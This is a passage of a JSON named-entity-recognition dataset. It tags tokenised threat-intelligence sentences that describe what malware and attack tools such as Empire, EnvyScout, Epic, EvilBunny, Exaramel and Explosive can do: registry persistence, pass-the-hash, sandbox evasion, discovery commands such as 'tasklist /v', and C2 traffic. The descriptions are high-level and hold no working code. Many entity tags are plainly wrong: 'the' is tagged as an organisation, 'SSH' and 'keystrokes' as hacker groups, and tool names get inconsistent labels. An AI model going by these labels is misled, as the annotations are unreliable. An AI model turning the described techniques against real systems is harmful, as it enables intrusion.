"find", "shared", "drives", "on", "the", "local", "system." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Empire", "can", "be", "used", "to", "conduct", "packet", "captures", "on", "target", "hosts." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Empire", "can", "perform", "pass", "the", "hash", "attacks." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "B-Org", "B-OffAct" ] }, { "tokens": [ "Empire", "contains", "modules", "that", "can", "discover", "and", "exploit", "path", "interception", "opportunities", "in", "the", "PATH", "environment", "variable." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Empire", "contains", "modules", "that", "can", "discover", "and", "exploit", "search", "order", "hijacking", "vulnerabilities." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Empire", "contains", "modules", "that", "can", "discover", "and", "exploit", "unquoted", "path", "vulnerabilities." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Exp" ] }, { "tokens": [ "Empire", "leverages", "PowerShell", "for", "the", "majority", "of", "its", "client-side", "agent", "tasks.", "Empire", "also", "contains", "the", "ability", "to", "conduct", "PowerShell", "remoting", "with", "the", "<code>Invoke-PSRemoting</code>", "module." ], "ner_tags": [ "B-HackOrg", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Empire", "can", "use", "modules", "like", "<code>Invoke-SessionGopher</code>", "to", "extract", "private", "key", "and", "session", "information." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "B-Purp", "O", "O", "O" ] }, { "tokens": [ "Empire", "can", "find", "information", "about", "processes", "running", "on", "local", "and", "remote", "systems." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Empire", "contains", "multiple", "modules", "for", "injecting", "into", "processes,", "such", "as", "<code>Invoke-PSInject</code>." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Way", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Empire", "can", "modify", "the", "registry", "run", "keys", "<code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>", "and", "<code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>", "for", "persistence." ], "ner_tags": [ "B-HackOrg", "O", "B-Features", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "Empire", "can", "add", "a", "SID-History", "to", "a", "user", "if", "on", "a", "domain", "controller." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Empire", "contains", "modules", "for", "executing", "commands", "over", "SSH", "as", "well", "as", "in-memory", "VNC", "agent", "injection." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "I-Features", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O", "B-Way", "B-Features", "O" ] }, { "tokens": [ "Empire", "has", "modules", "to", "interact", "with", "the", "Windows", "task", "scheduler." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Empire", "is", "capable", "of", "capturing", "screenshots", "on", "Windows", "and", "macOS", "systems." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Empire", "can", "enumerate", "antivirus", "software", "on", "the", "target." ], "ner_tags": [ "B-HackOrg", "O", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Empire", "can", "enumerate", "Security", "Support", "Providers", "(SSPs)", "as", "well", "as", "utilize", "PowerSploit's", "<code>Install-SSP</code>", "and", "<code>Invoke-Mimikatz</code>", "to", "install", "malicious", "SSPs", "and", "log", "authentication", "events." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "B-Purp", "B-Org", "O", "O", "O", "O", "B-Way", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "B-Purp", "O" ] }, { "tokens": [ "Empire", "can", "use", "PsExec", "to", "execute", "a", "payload", "on", "a", "remote", "host." ], "ner_tags": [ "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Empire", "can", "persist", "by", "modifying", "a", ".LNK", "file", "to", "include", "a", "backdoor." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "Empire", "can", "leverage", "its", "implementation", "of", "Mimikatz", "to", "obtain", "and", "use", "silver", "tickets." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Empire", "can", "enumerate", "host", "system", "information", "like", "OS,", "architecture,", "domain", "name,", "applied", "patches,", "and", "more." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Empire", "can", "acquire", "network", "configuration", "information", "like", "DNS", "servers,", "public", "IP,", "and", "network", "proxies", "used", "by", "a", "host." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "B-Features", "O", "O", "B-Tool", "O", "B-Tool", "O", "O", "B-Tool", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "Empire", "can", "enumerate", "the", "current", "network", "connections", "of", "a", "host." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Empire", "can", "enumerate", "the", "username", "on", "targeted", "hosts." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Empire", "can", "timestomp", "any", "files", "or", "payloads", "placed", "on", "a", "target", "machine", "to", "help", "them", "blend", "in." ], "ner_tags": [ "B-HackOrg", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Empire", "can", "capture", "webcam", "data", "on", "Windows", "and", "macOS", "systems." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Empire", "can", "conduct", "command", "and", "control", "over", "protocols", "like", "HTTP", "and", "HTTPS." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Empire", "has", "modules", "for", "executing", "scripts." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "I-Features", "O" ] }, { "tokens": [ "Empire", "can", "use", "WMI", "to", "deliver", "a", "payload", "to", "a", "remote", "host." ], "ner_tags": [ "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Empire", "can", "utilize", "built-in", "modules", "to", "modify", "service", "binaries", "and", "restore", "them", "to", "their", "original", "state." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "EnvyScout", "can", "collect", "sensitive", "NTLM", "material", "from", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O" ] }, { "tokens": [ "EnvyScout", "can", "deobfuscate", "and", "write", "malicious", "ISO", "files", "to", "disk." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "EnvyScout", "can", "Base64", "encode", "payloads." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "EnvyScout", "can", "call", "<code>window.location.pathname</code>", "to", "ensure", "that", "embedded", "files", "are", "being", "executed", "from", "the", "C:", "drive,", "and", "will", "terminate", "if", "they", "are", "not." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "EnvyScout", "can", "use", "protocol", "handlers", "to", "coax", "the", "operating", "system", "to", "send", "NTLMv2", "authentication", "responses", "to", "attacker-controlled", "infrastructure." ], "ner_tags": [ "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "EnvyScout", "contains", "JavaScript", "code", "that", "can", "extract", "an", "encoded", "blob", "from", "its", "HTML", "body", "and", "write", "it", "to", "disk." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "EnvyScout", "can", "use", "hidden", "directories", "and", "files", "to", "hide", "malicious", "executables." ], "ner_tags": [ "B-Idus", "O", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "EnvyScout", "can", "write", "files", "to", "disk", "with", "JavaScript", "using", "a", "modified", "version", "of", "the", "open-source", "tool", "FileSaver." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "EnvyScout", "has", "been", "executed", "through", "malicious", "files", "attached", "to", "e-mails." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "EnvyScout", "has", "used", "folder", "icons", "for", "malicious", "files", "to", "lure", "victims", "into", "opening", "them." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "EnvyScout", "has", "the", "ability", "to", "proxy", "execution", "of", "malicious", "files", "with", "Rundll32." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "EnvyScout", "has", "been", "distributed", "via", "spearphishing", "as", "an", "email", "attachment." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Way", "O", "O", "I-Way", "O" ] }, { "tokens": [ "EnvyScout", "can", "determine", "whether", "the", "ISO", "payload", "was", "received", "by", "a", "Windows", "or", "iOS", "device." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "EnvyScout", "can", "use", "cmd.exe", "to", "execute", "malicious", "files", "on", "compromised", "hosts." ], "ner_tags": [ "B-SamFile", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Epic", "encrypts", "collected", "data", "using", "a", "public", "key", "framework", "before", "sending", "it", "over", "the", "C2", "channel.", "Some", "variants", "encrypt", "the", "collected", "data", "with", "AES", "and", "encode", "it", "with", "base64", "before", "transmitting", "it", "to", "the", "C2", "server." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Epic", "compresses", "the", "collected", "data", "with", "bzip2", "before", "sending", "it", "to", "the", "C2", "server." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Turla", "has", "used", "valid", "digital", "certificates", "from", "Sysprint", "AG", "to", "sign", "its", "Epic", "dropper." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Time", "B-SecTeam", "O", "O", "O", "I-Tool", "O" ] }, { "tokens": [ "Epic", "has", "overwritten", "the", "function", "pointer", "in", "the", "extra", "window", "memory", "of", "Explorer's", "Shell_TrayWnd", "in", "order", "to", "execute", "malicious", "code", "in", "the", "context", "of", "the", "explorer.exe", "process." ], "ner_tags": [ "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "Epic", "has", "a", "command", "to", "delete", "a", "file", "from", "the", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Epic", "recursively", "searches", "for", "all", ".doc", "files", "on", "the", "system", "and", "collects", "a", "directory", "listing", "of", "the", "Desktop,", "%TEMP%,", "and", "%WINDOWS%\\Temp", "directories." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "Epic", "gathers", "a", "list", "of", "all", "user", "accounts,", "privilege", "classes,", "and", "time", "of", "last", "logon." ], "ner_tags": [ "B-SamFile", "B-Features", "I-Features", "I-Features", "O", "O", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Epic", "gathers", "information", "on", "local", "group", "names." ], "ner_tags": [ "B-SamFile", "B-SamFile", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Epic", "heavily", "obfuscates", "its", "code", "to", "make", "analysis", "more", "difficult." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Epic", "uses", "the", "<code>tasklist", "/v</code>", "command", "to", "obtain", "a", "list", "of", "processes." ], "ner_tags": [ "B-SamFile", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Epic", "uses", "the", "<code>rem", "reg", "query</code>", "command", "to", "obtain", "values", "from", "Registry", "keys." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Epic", "uses", "the", "<code>net", "view</code>", "command", "on", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Epic", "searches", "for", "anti-malware", "services", "running", "on", "the", "victim’s", "machine", "and", "terminates", "itself", "if", "it", "finds", "them." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Epic", "encrypts", "commands", "from", "the", "C2", "server", "using", "a", "hardcoded", "key." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Epic", "collects", "the", "OS", "version,", "hardware", "information,", "computer", "name,", "available", "system", "memory", "status,", "disk", "space", "information,", "and", "system", "and", "user", "language", "settings." ], "ner_tags": [ "B-SamFile", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Epic", "uses", "the", "<code>nbtstat", "-n</code>", "and", "<code>nbtstat", "-s</code>", "commands", "on", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "B-SamFile", "B-SamFile", "O", "B-SamFile", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Epic", "uses", "the", "<code>net", "use</code>,", "<code>net", "session</code>,", "and", "<code>netstat</code>", "commands", "to", "gather", "information", "on", "network", "connections." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Epic", "collects", "the", "user", "name", "from", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Epic", "uses", "the", "<code>tasklist", "/svc</code>", "command", "to", "list", "the", "services", "on", "the", "system." ], "ner_tags": [ "B-SamFile", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Epic", "uses", "the", "<code>net", "time</code>", "command", "to", "get", "the", "system", "time", "from", "the", "machine", "and", "collect", "the", "current", "date", "and", "time", "zone", "information." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Epic", "uses", "HTTP", "and", "HTTPS", "for", "C2", "communications." ], "ner_tags": [ "B-HackOrg", "O", "B-Way", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "EvilBunny", "has", "exploited", "CVE-2011-4369,", "a", "vulnerability", "in", "the", "PRC", "component", "in", "Adobe", "Reader." ], "ner_tags": [ "B-Idus", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "EvilBunny", "has", "deleted", "the", "initial", "dropper", "after", "running", "through", "the", "environment", "checks." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "EvilBunny", "has", "downloaded", "additional", "Lua", "scripts", "from", "the", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "EvilBunny", "has", "used", "various", "API", "calls", "as", "part", "of", "its", "checks", "to", "see", "if", "the", "malware", "is", "running", "in", "a", "sandbox." ], "ner_tags": [ "B-Idus", "O", "O", "O", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "EvilBunny", "has", "used", "EnumProcesses()", "to", "identify", "how", "many", "process", "are", "running", "in", "the", "environment." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "EvilBunny", "has", "created", "Registry", "keys", "for", "persistence", "in", "<code>[HKLM|HKCU]\\…\\CurrentVersion\\Run</code>." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "EvilBunny", "has", "executed", "commands", "via", "scheduled", "tasks." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "EvilBunny", "has", "been", "observed", "querying", "installed", "antivirus", "software." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "EvilBunny's", "dropper", "has", "checked", "the", "number", "of", "processes", "and", "the", "length", "and", "strings", "of", "its", "own", "file", "name", "to", "identify", "if", "the", "malware", "is", "in", "a", "sandbox", "environment." ], "ner_tags": [ "B-Idus", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "EvilBunny", "has", "used", "the", "API", "calls", "NtQuerySystemTime,", "GetSystemTimeAsFileTime,", "and", "GetTickCount", "to", "gather", "time", "metrics", "as", "part", "of", "its", "checks", "to", "see", "if", "the", "malware", "is", "running", "in", "a", "sandbox." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "B-Way", "O", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "EvilBunny", "has", "used", "time", "measurements", "from", "3", "different", "APIs", "before", "and", "after", "performing", "sleep", "operations", "to", "check", "and", "abort", "if", "the", "malware", "is", "running", "in", "a", "sandbox." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "EvilBunny", "has", "executed", "C2", "commands", "directly", "via", "HTTP." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "EvilBunny", "has", "an", "integrated", "scripting", "engine", "to", "download", "and", "execute", "Lua", "scripts." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "EvilBunny", "has", "used", "WMI", "to", "gather", "information", "about", "the", "system." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "EvilGrab", "has", "the", "capability", "to", "capture", "audio", "from", "a", "victim", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "EvilGrab", "has", "the", "capability", "to", "capture", "keystrokes." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "I-Features", "B-HackOrg" ] }, { "tokens": [ "EvilGrab", "adds", "a", "Registry", "Run", "key", "for", "ctfmon.exe", "to", "establish", "persistence." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "EvilGrab", "has", "the", "capability", "to", "capture", "screenshots." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "B-HackOrg" ] }, { "tokens": [ "EvilGrab", "has", "the", "capability", "to", "capture", "video", "from", "a", "victim", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Exaramel", "for", "Linux", "has", "a", "hardcoded", "location", "that", "it", "uses", "to", "achieve", "persistence", "if", "the", "startup", "system", "is", "Upstart", "or", "System", "V", "and", "it", "is", "running", "as", "root." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Exaramel", "for", "Linux", "uses", "crontab", "for", "persistence", "if", "it", "does", "not", "have", "root", "privileges." ], "ner_tags": [ "B-Time", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Exaramel", "for", "Linux", "can", "decrypt", "its", "configuration", "file." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-Features", "O" ] }, { "tokens": [ "Exaramel", "for", "Linux", "uses", "RC4", "for", "encrypting", "the", "configuration." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-Features", "O", "O" ] }, { "tokens": [ "Exaramel", "for", "Linux", "can", "attempt", "to", "find", "a", "new", "C2", "server", "if", "it", "receives", "an", "error." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Exaramel", "for", "Linux", "can", "uninstall", "its", "persistence", "mechanism", "and", "delete", "its", "configuration", "file." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "I-Features", "O" ] }, { "tokens": [ "Exaramel", "for", "Linux", "has", "a", "command", "to", "download", "a", "file", "from", "and", "to", "a", "remote", "C2", "server." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Exaramel", "for", "Linux", "can", "execute", "commands", "with", "high", "privileges", "via", "a", "specific", "binary", "with", "setuid", "functionality." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Exaramel", "for", "Linux", "can", "run", "<code>whoami</code>", "to", "identify", "the", "system", "owner." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Exaramel", "for", "Linux", "has", "a", "hardcoded", "location", "under", "systemd", "that", "it", "uses", "to", "achieve", "persistence", "if", "it", "is", "running", "as", "root." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Exaramel", "for", "Linux", "has", "a", "command", "to", "execute", "a", "shell", "command", "on", "the", "system." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Exaramel", "for", "Linux", "uses", "HTTPS", "for", "C2", "communications." ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Exaramel", "for", "Windows", "automatically", "encrypts", "files", "before", "sending", "them", "to", "the", "C2", "server." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Exaramel", "for", "Windows", "stores", "the", "backdoor's", "configuration", "in", "the", "Registry", "in", "XML", "format." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Exaramel", "for", "Windows", "specifies", "a", "path", "to", "store", "files", "scheduled", "for", "exfiltration." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "Exaramel", "for", "Windows", "dropper", "creates", "and", "starts", "a", "Windows", "service", "named", "wsmprovav", "with", "the", "description", "“Windows", "Check", "AV”", "in", "an", "apparent", "attempt", "to", "masquerade", "as", "a", "legitimate", "service." ], "ner_tags": [ "O", "B-SamFile", "O", "I-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Exaramel", "for", "Windows", "adds", "the", "configuration", "to", "the", "Registry", "in", "XML", "format." ], "ner_tags": [ "B-SamFile", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Exaramel", "for", "Windows", "has", "a", "command", "to", "execute", "VBS", "scripts", "on", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Exaramel", "for", "Windows", "has", "a", "command", "to", "launch", "a", "remote", "shell", "and", "executes", "commands", "on", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "Exaramel", "for", "Windows", "dropper", "creates", "and", "starts", "a", "Windows", "service", "named", "wsmprovav", "with", "the", "description", "“Windows", "Check", "AV.”" ], "ner_tags": [ "O", "B-SamFile", "O", "I-SamFile", "B-SecTeam", "B-Features", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Expand", "can", "be", "used", "to", "decompress", "a", "local", "or", "remote", "CAB", "file", "into", "an", "executable." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Expand", "can", "be", "used", "to", "download", "or", "upload", "a", "file", "over", "a", "network", "share." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "B-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Expand", "can", "be", "used", "to", "download", "or", "copy", "a", "file", "into", "an", "alternate", "data", "stream." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Explosive", "has", "a", "function", "to", "use", "the", "OpenClipboard", "wrapper." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Explosive", "can", "scan", "all", ".exe", "files", "located", "in", "the", "USB", "drive." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Explosive", "has", "commonly", "set", "file", "and", "path", "attributes", "to", "hidden." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Explosive", "has", "a", "function", "to", "download", "a", "file", "to", "the", "infected", "system." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Explosive", "has", "leveraged", "its", "keylogging", "capabilities", "to", "gain", "access", "to", "administrator", "accounts", "on", "target", "servers." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Explosive", "has", "a", "function", "to", "write", "itself", "to", "Registry", "values." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Explosive", "has", "a", "function", "to", "call", "the", "OpenClipboard", "wrapper." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Explosive", "has", "encrypted", "communications", "with", "the", "RC4", "method." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { 